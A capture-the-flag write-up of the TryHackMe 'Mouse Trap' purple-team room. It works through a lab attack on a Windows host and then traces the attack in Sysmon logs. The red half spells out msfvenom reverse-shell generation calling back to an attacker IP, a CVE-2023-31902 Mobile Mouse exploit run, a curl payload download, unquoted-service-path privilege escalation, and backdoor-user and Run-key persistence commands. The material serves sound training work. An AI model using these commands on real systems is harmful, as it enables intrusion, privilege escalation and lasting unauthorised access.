Mouse Trap

Follow Jom and Terry on their purple teaming adventures, emulating attacks and investigating the leftover artefacts. - by ar33zy, DrGonz0 & Aashir.Masood

TryHackMe | Cyber Security TrainingTryHackMe

The following post by 0xb0b is licensed under CC BY 4.0

---

Jom and Terry Go Purple

Follow the adventures of Jom and Terry, members of the TryMouseMe purple team, as they work through a thrilling exercise of Attack and Defense. From initial access to persistence, you will emulate a three-stage attack on a Windows environment.

Recon

We start with a Nmap scan of mousetrap.thm, this revealed several open ports on a Windows system. The host is running Microsoft services such as RPC (port 135), NetBIOS-SSN (port 139), and SMB (port 445). Remote Desktop Protocol (RDP) is available on port 3389. WinRM is accessible via Microsoft HTTPAPI on port 5985. Port 9099 seems to be unknown.

With a default script and service scan, we see that port 9099 is identified as a Mobile Mouse Server.

┌──(0xb0b㉿kali)-[~/Documents/tryhackme/mouse trap]
└─$ nmap -sT -sC -sV -p 135,139,445,3389,5985,7680,9099,9999,35913,47001,49664-49673 -Pn mousetrap.thm

Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-11-15 14:08 EST
Nmap scan report for mousetrap.thm (10.10.58.135)
Host is up (0.038s latency).

PORT      STATE  SERVICE       VERSION
135/tcp   open   msrpc         Microsoft Windows RPC
139/tcp   open   netbios-ssn   Microsoft Windows netbios-ssn
445/tcp   open   microsoft-ds?
3389/tcp  open   ms-wbt-server Microsoft Terminal Services
| rdp-ntlm-info: 
|   Target_Name: MOUSETRAP
|   NetBIOS_Domain_Name: MOUSETRAP
|   NetBIOS_Computer_Name: MOUSETRAP
|   DNS_Domain_Name: MOUSETRAP
|   DNS_Computer_Name: MOUSETRAP
|   Product_Version: 10.0.17763
|_  System_Time: 2024-11-15T19:10:02+00:00
| ssl-cert: Subject: commonName=MOUSETRAP
| Not valid before: 2024-07-03T16:07:31
|_Not valid after:  2025-01-02T16:07:31
|_ssl-date: 2024-11-15T19:10:45+00:00; -1m11s from scanner time.
5985/tcp  open   http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
7680/tcp  open   pando-pub?
9099/tcp  open   unknown
| fingerprint-strings: 
|   FourOhFourRequest, GetRequest: 
|     HTTP/1.0 200 OK 
|     Server: Mobile Mouse Server 
|     Content-Type: text/html 
|     Content-Length: 326
|_    <HTML><HEAD><TITLE>Success!</TITLE><meta name="viewport" content="width=device-width,user-scalable=no" /></HEAD><BODY BGCOLOR=#000000><br><br><p style="font:12pt arial,geneva,sans-serif; text-align:center; color:green; font-weight:bold;" >The server running on "MOUSETRAP" was able to receive your request.</p></BODY></HTML>
9999/tcp  open   abyss?
35913/tcp open   unknown
47001/tcp open   http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
49664/tcp open   msrpc         Microsoft Windows RPC
49665/tcp open   msrpc         Microsoft Windows RPC
49666/tcp open   msrpc         Microsoft Windows RPC
49667/tcp open   msrpc         Microsoft Windows RPC
49668/tcp open   msrpc         Microsoft Windows RPC
49669/tcp open   msrpc         Microsoft Windows RPC
49670/tcp closed unknown
49671/tcp open   msrpc         Microsoft Windows RPC
49672/tcp closed unknown
49673/tcp open   msrpc         Microsoft Windows RPC
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port9099-TCP:V=7.94SVN%I=7%D=11/15%Time=67379C49%P=x86_64-pc-linux-gnu%
SF:r(GetRequest,1A7,"HTTP/1\.0\x20200\x20OK\x20\r\nServer:\x20Mobile\x20Mo
SF:use\x20Server\x20\r\nContent-Type:\x20text/html\x20\r\nContent-Length:\
SF:x20326\r\n\r\n<HTML><HEAD><TITLE>Success!</TITLE><meta\x20name=\"viewpo
SF:rt\"\x20content=\"width=device-width,user-scalable=no\"\x20/></HEAD><BO
SF:DY\x20BGCOLOR=#000000><br><br><p\x20style=\"font:12pt\x20arial,geneva,s
SF:ans-serif;\x20text-align:center;\x20color:green;\x20font-weight:bold;\"
SF:\x20>The\x20server\x20running\x20on\x20\"MOUSETRAP\"\x20was\x20able\x20
SF:to\x20receive\x20your\x20request\.</p></BODY></HTML>\r\n")%r(FourOhFour
SF:Request,1A7,"HTTP/1\.0\x20200\x20OK\x20\r\nServer:\x20Mobile\x20Mouse\x
SF:20Server\x20\r\nContent-Type:\x20text/html\x20\r\nContent-Length:\x2032
SF:6\r\n\r\n<HTML><HEAD><TITLE>Success!</TITLE><meta\x20name=\"viewport\"\
SF:x20content=\"width=device-width,user-scalable=no\"\x20/></HEAD><BODY\x2
SF:0BGCOLOR=#000000><br><br><p\x20style=\"font:12pt\x20arial,geneva,sans-s
SF:erif;\x20text-align:center;\x20color:green;\x20font-weight:bold;\"\x20>
SF:The\x20server\x20running\x20on\x20\"MOUSETRAP\"\x20was\x20able\x20to\x2
SF:0receive\x20your\x20request\.</p></BODY></HTML>\r\n");
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2024-11-15T19:10:05
|_  start_date: N/A
|_clock-skew: mean: -1m11s, deviation: 0s, median: -1m11s

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 211.88 seconds

By visiting the index page, we see the info that the server is running on MOUSETRAP.

With a little research, we can find the following exploit of CVE-2023-31902:

GitHub - blue0x1/mobilemouse-exploit: Mobile Mouse 3.6.0.4 could allow a remote attacker to execute arbitrary code on the system, caused by improper input validation. By sending a specially-crafted request, an attacker could exploit this vulnerability to execute arbitrary code on the system.GitHub

The exploit has two versions, one that uses SMB and one that uses HTTP. It allows an attacker to execute arbitrary code on the target machine by sending a specially crafted request to the Mobile Mouse server

Remote code execution

The room asks us to do the following to gain remote code execution:

• Once you’ve found the CVE and exploit, use the version that uses SMB, not HTTP

• Generate a Windows stageless reverse TCP (x64) shell

• Ensure that your reverse shell is called shell.exe

We found an exploit targeting both SMB and HTTP, now we need to generate a reverse shell called shell.exe. We generate the shell.exe using msfvenom.

msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.14.90.235 LPORT=4445 -f exe > shell.exe

After we generated the shell, we set up a listener on 4445 and run the exploit:

python CVE-2023-31902-v2.py --target mousetrap.thm --file shell.exe --lhost 10.14.90.235

We get a connection back and we are purpletom.

In the users' directory of purpletom, we find the user flag.

Unquoted Service Path

The room now challenges us to abuse an unquoted service path to escalate privileges:

• Use SharpUp.exe for enumeration, located in C:\Users\purpletom

• Target the Mobile Mouse directory while executing the unquoted service path abuse

An Unquoted Service Path vulnerability occurs in Windows systems when a service's executable path contains spaces but is not enclosed in quotes. This misconfiguration can allow us to execute a malicious file placed in a higher-priority directory along the path, potentially escalating privileges.

We use SharpUp.exe as adivsed to find the vulnerability. The service runsHelperService.exe in an unquoted path in Mouse Uilities. So placing a Mouse.exe in Mobile Mousefolder should then execute Mouse.exe on runnning the service.

Next, we create a suitable executable that will run when placed in the unquoted path and the service is run.

msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.14.90.235 LPORT=4446 -f exe > mouse.exe

As a user, we are allowed to write to C:\Program Files (x86)\Mobile Mouse.

Next, we set up a python web server on our machine and use the PowerShell curl alias to download our crafted shell. We place it into C:\Program Files (x86)\Mobile Mouse.

curl http://10.14.90.235/mouse.exe -o mouse.exe

We list the available services via the following command:

wmic service list brief

There is the mobile mouse service:

Next, we set up a listener on port 4446. Via net start "Mobile Mouse Service" we run the service.

We get a connection back. We are NT Authority System. On the Desktop of the Administrator user, we find the root flag.

Furthermore, we are able to spot some credentials for the admin user.

Registry run keys and local account creation

Next thing to do is to apply persistence by adding the key shell to Windows\CurrentVersion\Run with the value C:\Windows\Temp\shell.exe and adding a user terry.

• Use the HKEY_CURRENT_USER registry hive

• Use the SYSTEM user when creating the run key persistence

• Specify the registry key name (shell)

• Use the following path for the payload (C:\Windows\Temp\shell.exe)

• Specify the name of the backdoor user (terry)

After using the following two commands we can run the checker.exe at C:\Users\Administrator\Desktop to reveal the final flag..

net user terry 12asdf$123 /add
reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v shell /t REG_SZ /d "C:\Windows\Temp\shell.exe" /f

The procedure is so stringent that the subsequent analysis can be understood in the same way. In the origin of the room, these were not two machines. To keep it fair and to have the same environment, we now have two machines for each part.

Time to Catch Terry

Now we switch to the blue side and try to understand what happened using the Sysmon Event Logs with Sysmonview. We follow the steps shown in the room to export the Sysmon logs as XML and import them afterwards in Sysmonview.

What is the name of the payload that was shared?

The first question asks us the name of the payload that was shared. On the first page, we have a list of DLLs and executables. By clicking on each of them, we can determine the image path. The executable payload.exe looks a bit suspicious. After clicking on it, we can see that the image path is indeed a shared folder.

What is the IP attacker’s IP address?

We have identified that suspicious executable. The IP is already present in the image path.

For the following questions, we will follow the steps below: Clicking on the image path displays a session. By clicking on it, we can see an event graph. Each event can be inspected.

Clicking on Process Create reveals the same info for the second question.

What is the full command-line of the executed payload?

As we have already shown above, we inspect the Process Create event. Here we see the command line issued.

What is the full command-line of the tool used to enumerate the privilege escalation vectors?

Besides the event graphs, we can also use the View All Events tab. Since we know from the previous red part, we had to use SharpUp.exe, and find the full command line for the tool here.

When was this tool executed?

At the same entry, we are able to locate the time executed.

This might be wrong

The actual time of execution was a bit earlier:

What command was used to transfer the reverse shell binary into the system?

Since we already know the IP of the attacker, we can search for this in All Events View. There we will find the command used to transfer the reverse shell.

What is the full command line value of the process created during the unquoted service path abuse?

As we know from the attack, we are looking for something like Mouse.exe. We use the All Events View again, drag and drop the column GUID into the field (2) and search for Mouse.exe. We have now several sessions available. Of interest are those around the time of the attack (8/6/2024 4:20). We find some session pointing to cmd.exe. By clicking on the following below (4) + (5) we see an Event graph. By clicking on the Process Create event, we see the parent command line having the path for the HelperService.exe.

What was the password set for the user created by the attacker for persistence

The next question asks us about the password set for the user created by an attacker. We could go through all the sessions around the time of the attack to find the password, but we could also go back to the Process View tab. Here we look for net.exe, which can be used to add new users. Here we find a session where a user was created around the time of the attack.

What is the key name used for persistence?

As with the user, we could now go through all sessions in the View All Event tab at the time of the attack. However, we can also explicitly search for reg.exe in the Process View tab. There we will find a session revealing us the key and the target path used by the attacker.

What is the target path of the persistence implant by the attacker?

As with the user, we could now go through all sessions in the View All Event tab at the time of the attack. However, we can also explicitly search for reg.exe in the Process View tab. There we will find a session revealing us the key and the target path used by the attacker.